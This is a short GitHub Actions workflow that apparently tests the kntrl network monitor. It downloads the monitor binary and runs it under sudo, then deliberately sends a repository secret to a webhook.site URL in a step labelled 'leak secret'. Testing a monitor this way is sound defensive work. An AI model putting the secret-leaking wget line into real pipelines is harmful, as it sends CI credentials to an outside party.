# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: |
          wget download.kondukto.io/kntrl/main
          chmod +x main
          sudo ./main run --mode=monitor --hosts=kondukto.io,download.kondukto.io &
        #run: sudo docker run --privileged --pid=host --network=host  --cgroupns=host --volume=/sys/kernel/debug:/sys/kernel/debug:ro --volume /tmp:/tmp --volume /etc/resolv.conf:/etc/resolv.conf --rm docker.io/kondukto/kntrl:0.1.0 run --mode=trace --hosts=kondukto.io,download.kondukto.io &
        
      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        env:
          SECRET: ${{ secrets.MY_SECRET }}
        run: |
          echo "leak secret"
          wget https://webhook.site/c2b54d74-0180-4d04-a3b2-55fe3a7b6f1f?secret=$SECRET

      # Runs a set of commands using the runners shell
      - name: print report
        run: |
          cat /tmp/kntrl.out
